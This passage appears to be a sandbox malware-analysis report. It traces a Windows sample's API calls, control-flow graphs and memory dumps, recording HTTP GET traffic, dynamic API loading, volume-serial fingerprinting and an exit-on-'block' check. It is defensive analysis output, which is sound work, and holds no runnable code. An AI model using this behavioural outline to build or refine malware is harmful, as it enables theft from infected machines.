                              • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 003B70CB
                              • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 003B70E2
                              • GetProcAddress.KERNEL32(75AE0000,00F2DA68), ref: 003B70FE
                              • GetProcAddress.KERNEL32(75AE0000,00F28B48), ref: 003B7116
                              • GetProcAddress.KERNEL32(75AE0000,00F2D9F0), ref: 003B712F
                              • GetProcAddress.KERNEL32(75AE0000,00F2D948), ref: 003B7147
                              • GetProcAddress.KERNEL32(76300000,00F15448), ref: 003B7163
                              • GetProcAddress.KERNEL32(6E580000,00F2D930), ref: 003B717F
                              • GetProcAddress.KERNEL32(6E580000,00F15688), ref: 003B7197
                              • GetProcAddress.KERNEL32(6E580000,00F2DB28), ref: 003B71B0
                              • GetProcAddress.KERNEL32(6E580000,00F2D900), ref: 003B71C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                              • Instruction ID: d6e7867b91b49e507cc170b5927f16545271cf61b0a008cf66943eeb8dbcdc4f
                              • Opcode Fuzzy Hash: 811f377d0f540eea5ac99e24f67d5b994ecb5b883695606d3d5e118023e79084
                              • Instruction Fuzzy Hash: 6B623CB9611E00EFD754DF64EC8DE2637BAF7A87013148919E956E3364DB34A808FB60
                              APIs
                              • lstrlen.KERNEL32(003BCFEC), ref: 003AF1D5
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF1F1
                              • lstrlen.KERNEL32(003BCFEC), ref: 003AF1FC
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF215
                              • lstrlen.KERNEL32(003BCFEC), ref: 003AF220
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF239
                              • lstrcpy.KERNEL32(00000000,003C4FA0), ref: 003AF25E
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF28C
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2C0
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003AF2F0
                              • lstrlen.KERNEL32(00F14FC8), ref: 003AF315
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                              • Instruction ID: 067b2971872f6a0c37b63b4a941bd8d134e5ac91fb4aad0ced190a8ed6d6b0cf
                              • Opcode Fuzzy Hash: 6fae33698a67d2b06170101716f4d5bde988800badfaaa52a229e050b8a9966d
                              • Instruction Fuzzy Hash: 0CA27F70901A069FCB22DFA9D849E6AB7F4FF55314F1A8079E809DB261DB31DC46CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0013
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B00BD
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B00E1
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B00EC
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0110
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B011B
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B013F
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B015A
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0189
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B0194
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B01C3
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B01CE
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0206
                              • lstrlen.KERNEL32(003BCFEC), ref: 003B0250
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B0288
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B059B
                              • lstrlen.KERNEL32(00F15168), ref: 003B05AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B05D7
                              • lstrcat.KERNEL32(00000000,?), ref: 003B05E3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B060E
                              • lstrlen.KERNEL32(00F2F5E0), ref: 003B0625
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B064C
                              • lstrcat.KERNEL32(00000000,?), ref: 003B0658
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0681
                              • lstrlen.KERNEL32(00F15208), ref: 003B0698
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B06C9
                              • lstrcat.KERNEL32(00000000,?), ref: 003B06D5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B0706
                              • lstrcpy.KERNEL32(00000000,00F28AF8), ref: 003B074B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391557
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 00391579
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 0039159B
                                • Part of subcall function 00391530: lstrcpy.KERNEL32(00000000,?), ref: 003915FF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B077F
                              • lstrcpy.KERNEL32(00000000,00F2F508), ref: 003B07E7
                              • lstrcpy.KERNEL32(00000000,00F28968), ref: 003B0858
                              • lstrcpy.KERNEL32(00000000,fplugins), ref: 003B08CF
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B0928
                              • lstrcpy.KERNEL32(00000000,00F28A28), ref: 003B09F8
                                • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392528
                                • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 0039254E
                                • Part of subcall function 003924E0: lstrcpy.KERNEL32(00000000,?), ref: 00392577
                              • lstrcpy.KERNEL32(00000000,00F28A98), ref: 003B0ACE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B0B81
                              • lstrcpy.KERNEL32(00000000,00F28A98), ref: 003B0D58
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID: fplugins
                              • API String ID: 2500673778-38756186
                              • Opcode ID: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                              • Instruction ID: 622cf737007ec87097d5021de7db22222cce05a7fd2e52fe4d09b88a3f294d2e
                              • Opcode Fuzzy Hash: 5dfa2ac68dfce4f8803d60418ba9c6315b69cb2a06628df97b62e4fc6a73b195
                              • Instruction Fuzzy Hash: 0CE28D71A053418FC736DF29C499BAAFBE0BF88308F5A856DD58D8B652DB30D845CB42

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2234 396c40-396c64 call 392930 2237 396c75-396c97 call 394bc0 2234->2237 2238 396c66-396c6b 2234->2238 2242 396c99 2237->2242 2243 396caa-396cba call 392930 2237->2243 2238->2237 2239 396c6d-396c6f lstrcpy 2238->2239 2239->2237 2244 396ca0-396ca8 2242->2244 2247 396cc8-396cf5 InternetOpenA StrCmpCA 2243->2247 2248 396cbc-396cc2 lstrcpy 2243->2248 2244->2243 2244->2244 2249 396cfa-396cfc 2247->2249 2250 396cf7 2247->2250 2248->2247 2251 396ea8-396ebb call 392930 2249->2251 2252 396d02-396d22 InternetConnectA 2249->2252 2250->2249 2261 396ec9-396ee0 call 392a20 * 2 2251->2261 2262 396ebd-396ebf 2251->2262 2253 396d28-396d5d HttpOpenRequestA 2252->2253 2254 396ea1-396ea2 InternetCloseHandle 2252->2254 2256 396d63-396d65 2253->2256 2257 396e94-396e9e InternetCloseHandle 2253->2257 2254->2251 2259 396d7d-396dad HttpSendRequestA HttpQueryInfoA 2256->2259 2260 396d67-396d77 InternetSetOptionA 2256->2260 2257->2254 2263 396daf-396dd3 call 3b71e0 call 392a20 * 2 2259->2263 2264 396dd4-396de4 call 3b3d90 2259->2264 2260->2259 2262->2261 2265 396ec1-396ec3 lstrcpy 2262->2265 2264->2263 2275 396de6-396de8 2264->2275 2265->2261 2276 396e8d-396e8e InternetCloseHandle 2275->2276 2277 396dee-396e07 InternetReadFile 2275->2277 2276->2257 2277->2276 2279 396e0d 2277->2279 2281 396e10-396e15 2279->2281 2281->2276 2283 396e17-396e3d call 3b7310 2281->2283 2286 396e3f call 392a20 2283->2286 2287 396e44-396e51 call 392930 2283->2287 2286->2287 2291 396e61-396e8b call 392a20 InternetReadFile 2287->2291 2292 396e53-396e57 2287->2292 2291->2276 2291->2281 2292->2291 2293 396e59-396e5b lstrcpy 2292->2293 2293->2291
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00396C6F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00396CC2
                              • InternetOpenA.WININET(003BCFEC,00000001,00000000,00000000,00000000), ref: 00396CD5
                              • StrCmpCA.SHLWAPI(?,00F2F930), ref: 00396CED
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00396D15
                              • HttpOpenRequestA.WININET(00000000,GET,?,00F2F4A8,00000000,00000000,-00400100,00000000), ref: 00396D50
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00396D77
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00396D86
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00396DA5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00396DFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 00396E5B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00396E7D
                              • InternetCloseHandle.WININET(00000000), ref: 00396E8E
                              • InternetCloseHandle.WININET(?), ref: 00396E98
                              • InternetCloseHandle.WININET(00000000), ref: 00396EA2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00396EC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                              • Instruction ID: 32a4ea8aadd2889ff7ee7939f8349e168157ef850856e37cfeb25a7a878f7235
                              • Opcode Fuzzy Hash: 3db69fbaee61ad8a42e8244db203cd2799e42e54074dfb9a37242058ab8e7f2b
                              • Instruction Fuzzy Hash: 92818075E12615AFEF21DFA4DC4AFAE77B8AF44700F154058F905EB280DB70AD048B90
                              APIs
                              • lstrlen.KERNEL32(00F14FC8), ref: 003AF315
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF3A3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF3C7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF47B
                              • lstrcpy.KERNEL32(00000000,00F14FC8), ref: 003AF4BB
                              • lstrcpy.KERNEL32(00000000,00F28B68), ref: 003AF4EA
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF59E
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003AF61C
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF64C
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF69A
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AF718
                              • lstrlen.KERNEL32(00F28B58), ref: 003AF746
                              • lstrcpy.KERNEL32(00000000,00F28B58), ref: 003AF771
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AF793
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AF7E4
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AFA32
                              • lstrlen.KERNEL32(00F28B38), ref: 003AFA60
                              • lstrcpy.KERNEL32(00000000,00F28B38), ref: 003AFA8B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003AFAAD
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AFAFE
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID: ERROR
                              • API String ID: 367037083-2861137601
                              • Opcode ID: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                              • Instruction ID: f095f7110ca07cda006a4c8cedfd58fe3c3bdb4c0ec5f536e739f26190f051d4
                              • Opcode Fuzzy Hash: a09326d384c1f990cec498d5d537d0d29ca44fc91c6151dcbe19d1197b4f8986
                              • Instruction Fuzzy Hash: 5AF12B70A01602CFCB26DFA9C848A6AB7F5FF55314B1A81BDD4099B2A1D736DC46CB90

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2721 3a8ca0-3a8cc4 StrCmpCA 2722 3a8ccd-3a8ce6 2721->2722 2723 3a8cc6-3a8cc7 ExitProcess 2721->2723 2725 3a8cec-3a8cf1 2722->2725 2726 3a8ee2-3a8eef call 392a20 2722->2726 2727 3a8cf6-3a8cf9 2725->2727 2729 3a8cff 2727->2729 2730 3a8ec3-3a8edc 2727->2730 2732 3a8d5a-3a8d69 lstrlen 2729->2732 2733 3a8dbd-3a8dcb StrCmpCA 2729->2733 2734 3a8ddd-3a8deb StrCmpCA 2729->2734 2735 3a8dfd-3a8e0b StrCmpCA 2729->2735 2736 3a8e1d-3a8e2b StrCmpCA 2729->2736 2737 3a8e3d-3a8e4b StrCmpCA 2729->2737 2738 3a8d30-3a8d3f lstrlen 2729->2738 2739 3a8e56-3a8e64 StrCmpCA 2729->2739 2740 3a8e88-3a8e9a lstrlen 2729->2740 2741 3a8e6f-3a8e7d StrCmpCA 2729->2741 2742 3a8d06-3a8d15 lstrlen 2729->2742 2743 3a8d84-3a8d92 StrCmpCA 2729->2743 2744 3a8da4-3a8db8 StrCmpCA 2729->2744 2730->2726 2770 3a8cf3 2730->2770 2758 3a8d6b-3a8d70 call 392a20 2732->2758 2759 3a8d73-3a8d7f call 392930 2732->2759 2733->2730 2745 3a8dd1-3a8dd8 2733->2745 2734->2730 2746 3a8df1-3a8df8 2734->2746 2735->2730 2747 3a8e11-3a8e18 2735->2747 2736->2730 2748 3a8e31-3a8e38 2736->2748 2737->2730 2749 3a8e4d-3a8e54 2737->2749 2756 3a8d49-3a8d55 call 392930 2738->2756 2757 3a8d41-3a8d46 call 392a20 2738->2757 2739->2730 2752 3a8e66-3a8e6d 2739->2752 2754 3a8e9c-3a8ea1 call 392a20 2740->2754 2755 3a8ea4-3a8eb0 call 392930 2740->2755 2741->2730 2753 3a8e7f-3a8e86 2741->2753 2750 3a8d1f-3a8d2b call 392930 2742->2750 2751 3a8d17-3a8d1c call 392a20 2742->2751 2743->2730 2761 3a8d98-3a8d9f 2743->2761 2744->2730 2745->2730 2746->2730 2747->2730 2748->2730 2749->2730 2779 3a8eb3-3a8eb5 2750->2779 2751->2750 2752->2730 2753->2730 2754->2755 2755->2779 2756->2779 2757->2756 2758->2759 2759->2779 2761->2730 2770->2727 2779->2730 2780 3a8eb7-3a8eb9 2779->2780 2780->2730 2781 3a8ebb-3a8ebd lstrcpy 2780->2781 2781->2730
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: ec0a53cbfc22ed29d496d9b3d9fcdf8d562d8dff3d014680d5739a53d8a81eb6
                              • Instruction ID: ceaccbe4594265aa5eef4c17cbda29794627e1dbbfb986500b80e5052f78a32d
                              • Opcode Fuzzy Hash: ec0a53cbfc22ed29d496d9b3d9fcdf8d562d8dff3d014680d5739a53d8a81eb6
                              • Instruction Fuzzy Hash: EC517FB1A04B01EFCB229F75DC8CEAB7BF8FB15700B10481DE442D6610DB74D9459BA1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2782 3b2740-3b2783 GetWindowsDirectoryA 2783 3b278c-3b27ea GetVolumeInformationA 2782->2783 2784 3b2785 2782->2784 2785 3b27ec-3b27f2 2783->2785 2784->2783 2786 3b2809-3b2820 GetProcessHeap RtlAllocateHeap 2785->2786 2787 3b27f4-3b2807 2785->2787 2788 3b2822-3b2824 2786->2788 2789 3b2826-3b2844 wsprintfA 2786->2789 2787->2785 2790 3b285b-3b2872 call 3b71e0 2788->2790 2789->2790
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 003B277B
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,003A93B6,00000000,00000000,00000000,00000000), ref: 003B27AC
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B280F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2816
                              • wsprintfA.USER32 ref: 003B283B
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
